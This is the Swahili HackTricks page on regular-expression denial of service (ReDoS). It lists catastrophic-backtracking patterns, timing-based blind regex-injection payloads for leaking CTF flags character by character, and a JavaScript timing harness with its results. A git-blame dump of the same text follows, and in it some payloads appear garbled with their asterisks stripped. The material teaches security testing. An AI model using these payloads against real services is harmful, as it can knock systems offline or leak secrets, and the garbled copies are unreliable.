hacktricks/pentesting-web/regular-expression-denial-of-service-redos.md

# Uharibifu wa Mfumo wa Kanuni ya Kawaida - ReDoS

<details>

<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.

</details>

# Uharibifu wa Mfumo wa Kanuni ya Kawaida (ReDoS)

**Uharibifu wa Mfumo wa Kanuni ya Kawaida (ReDoS)** hutokea wakati mtu anatumia udhaifu katika jinsi kanuni za kawaida (njia ya kutafuta na kulinganisha mifano katika maandishi) zinafanya kazi. Mara nyingi, wakati kanuni za kawaida zinapotumiwa, zinaweza kuwa polepole sana, hasa ikiwa kipande cha maandishi wanachofanya kazi nacho kinakuwa kikubwa. Uvivu huu unaweza kuwa mbaya sana hata kwa ongezeko dogo la ukubwa wa maandishi. Wadukuzi wanaweza kutumia tatizo hili kufanya programu inayotumia kanuni za kawaida isifanye kazi vizuri kwa muda mrefu.

## Algorithm ya Kawaida ya Kanuni ya Kawaida Inayosababisha Tatizo

**Angalia maelezo katika [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)**

## Kanuni za Uovu <a href="#evil-regexes" id="evil-regexes"></a>

Kanuni ya kawaida ya uovu ni ile inayoweza **kukwama kwenye kuingiza kilichoundwa na kusababisha DoS**. Kawaida, mifano ya kanuni ya uovu ina kikundi kinachorudiwa na kurudia au kubadilishana na kuvuka ndani ya kikundi kilichorudiwa. Baadhi ya mifano ya kanuni za uovu ni pamoja na:

* (a+)+
* ([a-zA-Z]+)*
* (a|aa)+
* (a|a?)+
* (.*a){x} kwa x > 10

Zote hizo zina hatari kwa kuingiza `aaaaaaaaaaaaaaaaaaaaaaaa!`.

## Malipo ya ReDoS

### Uchunguzi wa Nakala kupitia ReDoS

Katika CTF (au bug bounty) labda unadhibiti Kanuni ya kawaida ambayo habari nyeti (bendera) inalingana nayo. Kwa hivyo, inaweza kuwa na manufaa kufanya **ukurasa uweze kufungia (kutumia muda mrefu au muda mrefu zaidi)** ikiwa **Kanuni ya kawaida inalingana** na **sio kama haifanyi**. Kwa njia hii utaweza **kuchukua** herufi **kwa herufi**:

* Katika [**chapisho hili**](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) unaweza kupata sheria hii ya ReDoS: `^(?=<flag>)((.*)*)*salt$`
* Mfano: `^(?=HTB{sOmE_fl§N§)((.*)*)*salt$`
* Katika [**chapisho hili**](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) unaweza kupata hii:`<flag>(((((((.*)*)*)*)*)*)*)!`
* Katika [**chapisho hili**](https://ctftime.org/writeup/25869) alitumia: `^(?=${flag_prefix}).*.*.*.*.*.*.*.*!!!!$`

### Udhibiti wa Kuingiza na Kanuni ya Kawaida ya ReDoS

Zifuatazo ni mifano ya **ReDoS** ambapo unadhibiti **kuingiza** na **kanuni ya kawaida**:
```javascript
function check_time_regexp(regexp, text){
var t0 = new Date().getTime();;
new RegExp(regexp).test(text);
var t1 = new Date().getTime();;
console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")
}

// This payloads work because the input has several "a"s
[
//  "((a+)+)+$",  //Eternal,
//  "(a?){100}$", //Eternal
"(a|a?)+$",
"(\\w*)+$",   //Generic
"(a*)+$",
"(.*a){100}$",
"([a-zA-Z]+)*$", //Generic
"(a+)*$",
].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))

/*
Regexp (a|a?)+$ took 5076 milliseconds.
Regexp (\w*)+$ took 3198 milliseconds.
Regexp (a*)+$ took 3281 milliseconds.
Regexp (.*a){100}$ took 1436 milliseconds.
Regexp ([a-zA-Z]+)*$ took 773 milliseconds.
Regexp (a+)*$ took 723 milliseconds.
*/
```
## Vifaa

* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)
* [https://devina.io/redos-checker](https://devina.io/redos-checker)

## Marejeo
* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)
* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)
* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)

<details>

<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Njia nyingine za kusaidia HackTricks:

* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)!
* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com)
* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee
* **Jiunge na** 💬 [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
Translated to Swahili 2024-02-11 02:13:58 +00:00			`# Uharibifu wa Mfumo wa Kanuni ya Kawaida - ReDoS`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi ya PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [Familia ya PEASS](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) ya kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) repos za github.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`# Uharibifu wa Mfumo wa Kanuni ya Kawaida (ReDoS)`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Uharibifu wa Mfumo wa Kanuni ya Kawaida (ReDoS) hutokea wakati mtu anatumia udhaifu katika jinsi kanuni za kawaida (njia ya kutafuta na kulinganisha mifano katika maandishi) zinafanya kazi. Mara nyingi, wakati kanuni za kawaida zinapotumiwa, zinaweza kuwa polepole sana, hasa ikiwa kipande cha maandishi wanachofanya kazi nacho kinakuwa kikubwa. Uvivu huu unaweza kuwa mbaya sana hata kwa ongezeko dogo la ukubwa wa maandishi. Wadukuzi wanaweza kutumia tatizo hili kufanya programu inayotumia kanuni za kawaida isifanye kazi vizuri kwa muda mrefu.
a 2024-02-06 03:10:38 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Algorithm ya Kawaida ya Kanuni ya Kawaida Inayosababisha Tatizo`
GitBook: [master] 6 pages modified 2021-01-26 13:53:03 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Angalia maelezo katika [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Kanuni za Uovu <a href="#evil-regexes" id="evil-regexes"></a>`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Kanuni ya kawaida ya uovu ni ile inayoweza kukwama kwenye kuingiza kilichoundwa na kusababisha DoS. Kawaida, mifano ya kanuni ya uovu ina kikundi kinachorudiwa na kurudia au kubadilishana na kuvuka ndani ya kikundi kilichorudiwa. Baadhi ya mifano ya kanuni za uovu ni pamoja na:`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
a 2024-02-03 16:02:14 +00:00			`* (a+)+`
			`* ([a-zA-Z]+)*`
			`* (a\|aa)+`
			`* (a\|a?)+`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* (.*a){x} kwa x > 10`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			Zote hizo zina hatari kwa kuingiza `aaaaaaaaaaaaaaaaaaaaaaaa!`.
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Malipo ya ReDoS`
GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Uchunguzi wa Nakala kupitia ReDoS`
GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Katika CTF (au bug bounty) labda unadhibiti Kanuni ya kawaida ambayo habari nyeti (bendera) inalingana nayo. Kwa hivyo, inaweza kuwa na manufaa kufanya ukurasa uweze kufungia (kutumia muda mrefu au muda mrefu zaidi) ikiwa Kanuni ya kawaida inalingana na sio kama haifanyi. Kwa njia hii utaweza kuchukua herufi kwa herufi:`
GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			* Katika [chapisho hili](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets) unaweza kupata sheria hii ya ReDoS: `^(?=<flag>)((.))*salt$`
			* Mfano: `^(?=HTB{sOmE_fl§N§)((.))*salt$`
			* Katika [chapisho hili](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html) unaweza kupata hii:`<flag>(((((((.))))))*)!`
			* Katika [chapisho hili](https://ctftime.org/writeup/25869) alitumia: `^(?=${flag_prefix})........!!!!$`
GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`### Udhibiti wa Kuingiza na Kanuni ya Kawaida ya ReDoS`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Zifuatazo ni mifano ya ReDoS ambapo unadhibiti kuingiza na kanuni ya kawaida:`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			```javascript
			`function check_time_regexp(regexp, text){`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`var t0 = new Date().getTime();;`
			`new RegExp(regexp).test(text);`
			`var t1 = new Date().getTime();;`
			`console.log("Regexp " + regexp + " took " + (t1 - t0) + " milliseconds.")`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			`}`

GitBook: [#3088] No subject 2022-04-05 22:13:36 +00:00			`// This payloads work because the input has several "a"s`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			`[`
			`// "((a+)+)+$", //Eternal,`
			`// "(a?){100}$", //Eternal`
Translated to Swahili 2024-02-11 02:13:58 +00:00			`"(a\|a?)+$",`
			`"(\\w*)+$", //Generic`
			`"(a*)+$",`
			`"(.*a){100}$",`
			`"([a-zA-Z]+)*$", //Generic`
			`"(a+)*$",`
GitBook: [master] 5 pages modified 2021-01-26 13:51:43 +00:00			`].forEach(regexp => check_time_regexp(regexp, "aaaaaaaaaaaaaaaaaaaaaaaaaa!"))`

			`/*`
			`Regexp (a\|a?)+$ took 5076 milliseconds.`
			`Regexp (\w*)+$ took 3198 milliseconds.`
			`Regexp (a*)+$ took 3281 milliseconds.`
			`Regexp (.*a){100}$ took 1436 milliseconds.`
			`Regexp ([a-zA-Z]+)*$ took 773 milliseconds.`
			`Regexp (a+)*$ took 723 milliseconds.`
			`*/`
			```
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Vifaa`
GitBook: [master] one page modified 2021-04-16 09:25:21 +00:00
GitBook: [#3128] No subject 2022-04-27 12:34:57 +00:00			`* [https://github.com/doyensec/regexploit](https://github.com/doyensec/regexploit)`
			`* [https://devina.io/redos-checker](https://devina.io/redos-checker)`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`## Marejeo`
a 2024-02-03 16:02:14 +00:00			`* [https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)`
a 2024-02-06 03:10:38 +00:00			`* [https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets](https://portswigger.net/daily-swig/blind-regex-injection-theoretical-exploit-offers-new-way-to-force-web-apps-to-spill-secrets)`
			`* [https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html](https://github.com/jorgectf/Created-CTF-Challenges/blob/main/challenges/TacoMaker%20%40%20DEKRA%20CTF%202022/solver/solver.html)`
			`* [https://ctftime.org/writeup/25869](https://ctftime.org/writeup/25869)`
a 2024-02-03 16:02:14 +00:00
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

Translated to Swahili 2024-02-11 02:13:58 +00:00			`<summary><strong>Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`Njia nyingine za kusaidia HackTricks:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
Translated to Swahili 2024-02-11 02:13:58 +00:00			`* Ikiwa unataka kuona kampuni yako inatangazwa kwenye HackTricks au kupakua HackTricks kwa muundo wa PDF Angalia [MPANGO WA KUJIUNGA](https://github.com/sponsors/carlospolop)!`
			`* Pata [swag rasmi wa PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Gundua [The PEASS Family](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [NFTs](https://opensea.io/collection/the-peass-family) za kipekee`
			`* Jiunge na 💬 [Kikundi cha Discord](https://discord.gg/hRep4RUj7f) au [kikundi cha telegram](https://t.me/peass) au tufuate kwenye Twitter 🐦 [@carlospolopm](https://twitter.com/hacktricks_live).`
			`* Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa [HackTricks](https://github.com/carlospolop/hacktricks) na [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`